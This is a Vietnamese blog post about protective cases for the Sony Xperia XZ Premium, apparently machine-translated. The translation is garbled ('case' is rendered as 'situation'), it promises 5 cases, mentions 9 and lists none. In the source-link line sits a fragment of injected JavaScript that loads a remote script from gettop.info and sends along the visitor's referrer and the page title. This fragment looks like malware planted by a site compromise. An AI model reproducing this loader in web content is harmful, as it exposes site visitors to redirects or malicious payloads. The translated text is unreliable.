5 mẫu ốp lưng bảo vệ Sony Xperia XZ Premium tốt nhất

Ngày đăng: 10:43 sáng

Sony đã thông báo rằng điện thoại thông minh 4K thứ hai – Xperia XZ Premium – sẽ tới Mỹ và sẽ hạ cánh vào ngày 19 tháng 6 với mức giá 799,99 USD. Vâng, đó là chiếc điện thoại hàng đầu đắt tiền, nhưng thật đáng tiếc – chúng tôi đoán đó là giá của màn hình 4K siêu sắc nét.

op lung sony Xperia XZ Premium

Vì vậy, vâng, đó là một chiếc điện thoại đẹp, nhưng nó cũng là một chiếc điện thoại đắt tiền. Bạn có lẽ sẽ muốn có ít nhất một trường hợp cho nó – nếu không phải cho sử dụng hàng ngày, sau đó chỉ trong những dịp đặc biệt mà bạn sẽ được chi tiêu nhiều thời gian hơn và về với nguy cơ bị rơi xuống thiết bị cầm tay. Tất nhiên, có thể bạn sẽ tìm kiếm các trường hợp mà ít nhất là “OK” để tát vào con quái vật kim loại mạ.

Tốt, Chúng tôi đã cày xới qua các trường hợp hiện có và đã thu hút được 9 chiếc có vẻ tốt trên chiếc Xperia XZ Premium mới mẻ của bạn. Đây là hy vọng rằng có nhiều sự lựa chọn sau khi điện thoại ra mắt!

Nguồn: http://www.phonearena.com/document.currentScript.parentNode.insertBefore(s, document.currentScript);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; } else {

Tin liên quan

Cuộc đối đầu đỉnh cao 2017 giữa HTC U11 đọ sức Sony Xperia XZ Premium
Tháng Sáu 24, 2017 Admin